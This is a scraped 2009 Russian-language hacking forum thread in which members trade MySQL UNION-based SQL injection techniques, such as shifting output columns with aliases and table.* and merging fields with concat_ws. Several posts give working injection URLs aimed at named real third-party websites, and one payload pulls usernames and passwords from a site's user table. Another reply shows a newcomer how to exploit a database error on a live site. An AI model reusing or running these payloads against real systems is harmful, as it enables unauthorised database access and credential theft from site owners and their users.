Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей.
Здесь обсуждаются безопасность, программирование, технологии и многое другое.
Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
 |
|
28.02.2009, 18:47
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
ошибаешься, данными можно двигать, так что (учитывая размах в плане версий  ) мой вариант эффективнее =)
все-таки вот small example (в виде двух эквивалентных по результатам запросов) к написанному материалу, или просто для тех кто не вкурил в таблицу jokester
вариант 1 алиасы:
dedenksportkampioen.be/?pagina=go.php&item=1&id=1+union+select+*+from+use rs,(select+1,2,3,4,5,6)a
dedenksportkampioen.be/?pagina=go.php&item=1&id=1+union+select+*+from+(se lect+1)b,users,(select+1,2,3,4,5)a
вариант 2:
dedenksportkampioen.be/?pagina=go.php&item=1&id=1+union+select+*,1,2,3,4, 5,6+from+users
dedenksportkampioen.be/?pagina=go.php&item=1&id=1+union+select+6,users.*, 2,3,4,5,1+from+users
|
|
|
28.02.2009, 19:24
|
|
Познающий
Регистрация: 11.09.2008
Сообщений: 99
Провел на форуме:
2753780
Репутация:
585
|
|
ошибаешься, данными можно двигать, так что (учитывая размах в плане версий ) мой вариант эффективнее =)
Да, молодец. БХР достается тебе. ((:
p.s. Я предложенный мною способ придумал года полтора назад, после того как в логах одного сайта нашел попытку провести инъекцию вида
Код:
-1+union+select+*,1,2,3,4,5+from+users
У атакующего не получилось вытащить пасс, так как он не додумался "подвигать" выводимые данные, у меня - получилось с помощью вышеописанного способа с алиасами в from'е. Еще тогда я подумал, что должен быть более красивый способ сделать это. Но, по ряду причин, я не догадался использовать запись с "table_name.*" вместо записи вида
Код:
-1+union+select+6,*,2,3,4,5,1+from+users
которая неработоспособна.
Последний раз редактировалось cr0w; 01.03.2009 в 03:33..
|
|
|
|
12.03.2009, 18:44
|
|
Новичок
Регистрация: 03.03.2009
Сообщений: 2
Провел на форуме:
6209
Репутация:
-1
|
|
у меня вопрос
через эту ошибку можно что нибудь сделать
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/gloh2o/public_html/news.php on line 190
The news article you selected could not be found.
|
|
|
|
12.03.2009, 19:20
|
|
Members of Antichat - Level 5
Регистрация: 15.06.2008
Сообщений: 941
Провел на форуме:
5111568
Репутация:
2399
|
|
у меня вопрос
через эту ошибку можно что нибудь сделать
Цитата:
Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/gloh2o/public_html/news.php on line 190
The news article you selected could not be found.
http://www.globalwaterfoundation.org/
news.php?id=
21+union+select+1,column_name,3+from+information_s chema.columns+WHERE+table_name='COLLATIONS'+limit+ 1,1/*
)
|
|
|
|
12.03.2009, 19:27
|
|
Постоянный
Регистрация: 29.09.2008
Сообщений: 553
Провел на форуме:
2584134
Репутация:
519
|
|
Ну а если до конца, то:
Код:
http://www.globalwaterfoundation.org/news.php?id=-1+union+select+1,concat_ws(0x3a,user_username,user_password),3+from+wma_users+limit+0,1/*
логин/пас:
|
|
|
|
14.03.2009, 08:14
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме:
1934122
Репутация:
118
|
|
не получается провести, если в инъекции 2 поля, а в таблице три столбца. То как быть в такой ситуации?
|
|
|
|
14.03.2009, 12:38
|
|
Reservists Of Antichat - Level 6
Регистрация: 10.04.2008
Сообщений: 299
Провел на форуме:
1199829
Репутация:
405
|
|
Сообщение от shellz[21h]
не получается провести, если в инъекци и 2 поля, а в таблице три столбца. То как быть в такой ситуации?
так
.php?sqlinj=-1+union+select+concat_ws(0x3a,column1,column2,colu mn3),2+from+yourtable
пробелы убирать не забывай
__________________
II venēficus, ī m.
(с лат.) волшебник, чародей
Последний раз редактировалось Neoveneficus; 14.03.2009 в 12:47..
|
|
|
|
14.03.2009, 12:55
|
|
Постоянный
Регистрация: 20.12.2007
Сообщений: 334
Провел на форуме:
1934122
Репутация:
118
|
|
я про метод подбора полей.
id=1+union+select+*+from+users,(select+1,2,3,4,5,6 )a
у меня всего два поля, т.е. ?id=-1+union+select+1,2+from+users
заведомо знаю, что в таблице 3 поля, user_id,user,passwd.
просто решил проверить технику, но не получается.
--
как я понял, количесво полей не даст, вывисти столбцы(
Последний раз редактировалось shellz[21h]; 14.03.2009 в 14:08..
|
|
|
|
09.04.2009, 01:32
|
|
Новичок
Регистрация: 23.03.2009
Сообщений: 10
Провел на форуме:
95007
Репутация:
-9
|
|
Я наверно задам глупый вопрос но может у кого нибуть есть все команды sql и что они обозначяют???
А ещё лучьше напишите статью в каких случаях какие применять!
зарание спосибо!!!
Да и ещё если ктото будет не против обьеснить пару маментов ( бесплатно ) пастучите пожалусто icq 412264840 ( хотя токие врятли будут  )
и за что -5 поставили?
Последний раз редактировалось Plaf-di; 09.04.2009 в 01:58..
|
|
|
|
11.04.2009, 20:00
|
|
Leaders of Antichat - Level 4
Регистрация: 02.06.2005
Сообщений: 1,411
Провел на форуме:
10605912
Репутация:
4693
|
|
Начни с: http://dev.mysql.com/doc/refman/5.0/en/index.html
__________________
Я отдал бы немало за пару крыльев,
Я отдал бы немало за третий глаз
За руку на которой четырнадцать пальцев
Мне нужен для дыхания другой газ..
Мой блог: http://qwazar.ru/.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
![Аватар для shellz[21h]](/avatars/avatar46780.gif){kind=avatar}
Похожие темы
Линейный вид
